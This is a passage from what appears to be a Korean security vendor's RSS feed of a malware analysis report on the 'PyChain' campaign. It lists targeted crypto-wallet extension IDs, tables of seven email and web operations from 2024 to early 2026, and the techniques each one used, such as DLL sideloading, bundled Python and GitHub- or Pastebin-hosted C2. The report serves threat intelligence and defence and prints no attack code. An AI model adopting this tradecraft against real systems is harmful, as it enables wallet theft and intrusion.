&lt;td style=&quot;width: 50.1163%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;Phantom / Solflare&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 49.8837%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;`bfnaelmomeimhlpmgjnjophhpkkoljpa`, &lt;br /&gt;`bhhhlbepdkbapadjdnnojkbgioiodbic`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 4] &lt;span&gt;암호화폐 지갑 확장 프로그램 관련 문자열&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;위협의&amp;nbsp; 진화 및 특성 분석&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;2024&lt;/span&gt;&lt;span&gt;년 말부터&lt;span&gt; 2026&lt;/span&gt;년&lt;span&gt; 1&lt;/span&gt;월까지 관찰된 캠페인은 유포 채널에 따라 이메일 기반&lt;span&gt; 5&lt;/span&gt;종&lt;span&gt;(Email case 1~5), &lt;/span&gt;웹 기반&lt;span&gt; 2&lt;/span&gt;종&lt;span&gt;(Web case1~2) &lt;/span&gt;으로 나뉘며&lt;span&gt;, [&lt;/span&gt;표&lt;span&gt; 5] Operations &lt;/span&gt;분류에서&lt;span&gt; 7&lt;/span&gt;개&lt;span&gt; Operation&lt;/span&gt;의 활동 기간 및 &lt;span&gt;Activity &lt;/span&gt;수와 대표적인 특징을 확인할 수 있습니다.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 140px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 20%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;Operation&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;유형&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;활동 기간&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 11.5116%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;Activity &lt;/span&gt;&lt;span&gt;수&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 28.4884%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;특징&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;Email case 1&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;이메일&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;2024&lt;/span&gt;&lt;span&gt;년 &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 11.5116%; height: 17px;&quot;&gt;48&lt;/td&gt;
&lt;td style=&quot;width: 28.4884%; height: 17px;&quot;&gt;&lt;span&gt;형상관리&lt;span&gt;(GitHub/GitLab) &lt;/span&gt;활용&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span style=&quot;background-color: #efefef; color: #333333; text-align: start;&quot;&gt;Email case 2&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;이메일&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;2025/01 ~ 03&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 11.5116%; height: 17px;&quot;&gt;67&lt;/td&gt;
&lt;td style=&quot;width: 28.4884%; height: 17px;&quot;&gt;&lt;span&gt;msimg32.dll &lt;/span&gt;&lt;span&gt;사용&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span style=&quot;background-color: #efefef; color: #333333; text-align: start;&quot;&gt;Email case 3&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;이메일&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;2025/05 ~ 09&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 11.5116%; height: 17px;&quot;&gt;62&lt;/td&gt;
&lt;td style=&quot;width: 28.4884%; height: 17px;&quot;&gt;&lt;span&gt;version.dll &lt;/span&gt;&lt;span&gt;사용&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span style=&quot;background-color: #efefef; color: #333333; text-align: start;&quot;&gt;Email case 4&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;이메일&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;2025/05 ~ 12&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 11.5116%; height: 17px;&quot;&gt;138&lt;/td&gt;
&lt;td style=&quot;width: 28.4884%; height: 17px;&quot;&gt;&lt;span&gt;AppvIsvSubsystems64.dll &lt;/span&gt;&lt;span&gt;사용&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span style=&quot;background-color: #efefef; color: #333333; text-align: start;&quot;&gt;Email case 5&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;이메일&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;2025/11 ~ 2026/01&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 11.5116%; height: 17px;&quot;&gt;159&lt;/td&gt;
&lt;td style=&quot;width: 28.4884%; height: 17px;&quot;&gt;&lt;span&gt;urlmon.dll &lt;/span&gt;&lt;span&gt;사용&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;Web case 1&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;웹&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;2024&lt;/span&gt;&lt;span&gt;년&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 11.5116%; height: 17px;&quot;&gt;19&lt;/td&gt;
&lt;td style=&quot;width: 28.4884%; height: 17px;&quot;&gt;&lt;span&gt;AI &lt;/span&gt;&lt;span&gt;영상 도구 위장&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;Web case 2&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;웹&lt;/td&gt;
&lt;td style=&quot;width: 20%; height: 17px;&quot;&gt;&lt;span&gt;2025/03 ~ 04&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 11.5116%; height: 17px;&quot;&gt;32&lt;/td&gt;
&lt;td style=&quot;width: 28.4884%; height: 17px;&quot;&gt;&lt;span&gt;CapCut/AICore &lt;/span&gt;&lt;span&gt;위장&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;[&lt;/span&gt;표 &lt;span&gt;5] Operations &lt;/span&gt;분류&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;4500&quot; data-origin-height=&quot;1800&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cZhulM/dJMcaduyRV0/kzZn4hSLQ96CeL6Do7nbxk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cZhulM/dJMcaduyRV0/kzZn4hSLQ96CeL6Do7nbxk/img.png&quot; data-alt=&quot;[그림 11] 유포 타임라인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cZhulM/dJMcaduyRV0/kzZn4hSLQ96CeL6Do7nbxk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcZhulM%2FdJMcaduyRV0%2FkzZn4hSLQ96CeL6Do7nbxk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;4500&quot; height=&quot;1800&quot; data-origin-width=&quot;4500&quot; data-origin-height=&quot;1800&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 11] 유포 타임라인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;각&lt;span&gt; Operation&lt;/span&gt;의 기술적 특성을 정량화하기 위해 형상관리도구&lt;span&gt;, &lt;/span&gt;자체인프라&lt;span&gt;, &lt;/span&gt;클라우드&lt;span&gt;, &lt;/span&gt;파이썬이용&lt;span&gt;, &lt;/span&gt;파이썬동봉&lt;span&gt;, &lt;/span&gt;파이썬다운로드&lt;span&gt;, &lt;/span&gt;&lt;/span&gt;&lt;span&gt;사이드로딩&lt;span&gt; 7&lt;/span&gt;개 항목으로 특성 벡터를 정의했으며&lt;span&gt;, [&lt;/span&gt;표&lt;span&gt; 6]&lt;/span&gt;에&lt;span&gt; Operation&lt;/span&gt;별&lt;span&gt; Vector &lt;/span&gt;체크리스트에&lt;span&gt; Operation&lt;/span&gt;별 사용&lt;span&gt;(○)&lt;b&gt;&amp;middot;&lt;/b&gt;&lt;/span&gt;미사용&lt;span&gt;(&amp;times;)&lt;b&gt;&amp;middot;&lt;/b&gt;&lt;/span&gt;일부 변종만 해당&lt;span&gt;(△) &lt;/span&gt;여부를 정리했습니다&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&amp;nbsp;형상관리도구: GitHub/GitLab/Bitbucket, Pastebin, paste.rs 등 정상 개발/코드&amp;middot;텍스트 호스팅 플랫폼을 C2&amp;middot;페이로드 호스팅에 활용&lt;/li&gt;
&lt;li&gt;자체 인프라&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;: &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;공격자가 직접 구축&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&amp;middot;&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;관리하는&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; C2 &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;서버 사용&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;클라우드&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;: Dropbox, MediaFire &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;등 퍼블릭 클라우드 스토리지 활용&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;파이썬 이용&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;: Python &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;기반 악성 스크립트 사용&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;파이썬 동봉&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;: Python &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;런타임 및 스크립트를&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; ZIP &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;내부에 직접 포함&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파이썬 버전&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; 3.10)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;파이썬 다운로드&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;: &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;외부에서&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; Python &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;패키지 동적 다운로드&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;사&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;이드로딩: DLL 사이드로딩 기법 사용&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이 벡터를 보면 파이썬 패키지를 이용한 공격 방식은&lt;span&gt; 7&lt;/span&gt;개&lt;span&gt; Operation &lt;/span&gt;전반에서 공통으로 유지되고&lt;span&gt;, &lt;/span&gt;형상관리&lt;span&gt;/&lt;/span&gt;클라우드&lt;span&gt;/C2/DLL &lt;/span&gt;사이드로딩&lt;span&gt;/&lt;/span&gt;파일 동봉&lt;span&gt;/&lt;/span&gt;다운로드 조합만 시기별로 바뀌고 있음을 알 수 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;즉&lt;span&gt; LoneNone&lt;/span&gt;은 핵심 공격 방식은 유지한 채&lt;span&gt;, &lt;/span&gt;인프라&lt;span&gt;/&lt;/span&gt;로더&lt;span&gt;/&lt;/span&gt;페이로드 전달 방식만 단계적으로 진화시켜 온 것으로 해석할 수 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;범례&lt;span&gt;:&amp;nbsp; O &lt;/span&gt;사용&lt;span&gt;, X &lt;/span&gt;미사용&lt;span&gt;, △ &lt;/span&gt;일부 변종에서만 관찰&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 148px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 13.6628%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;특성&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;Email case 1&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 21px; text-align: center;&quot;&gt;Email case 2&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 21px; text-align: center;&quot;&gt;Email case 3&lt;/td&gt;
&lt;td style=&quot;width: 12.1512%; height: 21px; text-align: center;&quot;&gt;Email case 4&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 21px; text-align: center;&quot;&gt;Email case 5&lt;/td&gt;
&lt;td style=&quot;width: 11.9186%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;Web case 1&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;Web case 1&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 13.6628%; height: 21px;&quot;&gt;형상관리도구&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 21px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 21px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 21px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.1512%; height: 21px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 21px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 11.9186%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;△&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 21px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 13.6628%; height: 21px;&quot;&gt;자체인프라&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 21px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 21px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 21px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.1512%; height: 21px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 21px; text-align: center;&quot;&gt;O&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 11.9186%; height: 21px; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: #f9f9f9; color: #333333; text-align: start;&quot;&gt;O&amp;nbsp;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 21px; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: #f9f9f9; color: #333333; text-align: start;&quot;&gt;O&amp;nbsp;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 13.6628%; height: 17px;&quot;&gt;클라우드&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.1512%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 11.9186%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 13.6628%; height: 17px;&quot;&gt;파이썬이용&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.1512%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 11.9186%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;△&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: #f9f9f9; color: #333333; text-align: start;&quot;&gt;O&amp;nbsp;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 13.6628%; height: 17px;&quot;&gt;파이썬동봉&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.1512%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 11.9186%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: #f9f9f9; color: #333333; text-align: start;&quot;&gt;O&amp;nbsp;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 13.6628%; height: 17px;&quot;&gt;파이썬다운로드&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.1512%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 11.9186%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;△&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 13.6628%; height: 17px;&quot;&gt;사이드로딩&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.1512%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 12.3837%; height: 17px; text-align: center;&quot;&gt;O&lt;/td&gt;
&lt;td style=&quot;width: 11.9186%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;td style=&quot;width: 12.5%; height: 17px; text-align: center;&quot;&gt;X&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[ &lt;span&gt;표 &lt;span&gt;6] Operation&lt;/span&gt;별 &lt;span&gt;Vector &lt;/span&gt;체크리스트&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;해당 포스트에서는 &lt;span&gt;PyChain &lt;/span&gt;캠페인의 기술적 진화 과정과&lt;span&gt; Operation&lt;/span&gt;별 특성을 정리했습니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;위협의 진화 및 특성과 결론 등 상세 내용은 인텔리전스 보고서로 보관 중이며&lt;span&gt;, &lt;/span&gt;본 포스팅에서는 추가로 공개하지 않습니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;해당 내용에 대한 문의나 협력 요청이 있으시면&lt;span&gt; esrc@estsecurity.com&lt;/span&gt;으로 연락해 주시기 바랍니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;479&quot; data-origin-height=&quot;678&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Yisfa/dJMcac3qyLD/hcuBWBXLbPqfE9hlunADc1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Yisfa/dJMcac3qyLD/hcuBWBXLbPqfE9hlunADc1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Yisfa/dJMcac3qyLD/hcuBWBXLbPqfE9hlunADc1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FYisfa%2FdJMcac3qyLD%2FhcuBWBXLbPqfE9hlunADc1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;479&quot; height=&quot;678&quot; data-origin-width=&quot;479&quot; data-origin-height=&quot;678&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;a href=&quot;https://www.estsecurity.com/&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bFfYIM/dJMcaipaXgW/S3o5tkhm5KCoZRigafPgd0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbFfYIM%2FdJMcaipaXgW%2FS3o5tkhm5KCoZRigafPgd0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>악성코드 분석 리포트</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5740</guid>
      <comments>https://alyacofficialblog.tistory.com/5740#entry5740comment</comments>
      <pubDate>Tue, 17 Mar 2026 10:54:44 +0900</pubDate>
    </item>
    <item>
      <title>가짜 FileZilla 사이트를 이용한 악성코드 유포</title>
      <link>https://alyacofficialblog.tistory.com/5738</link>
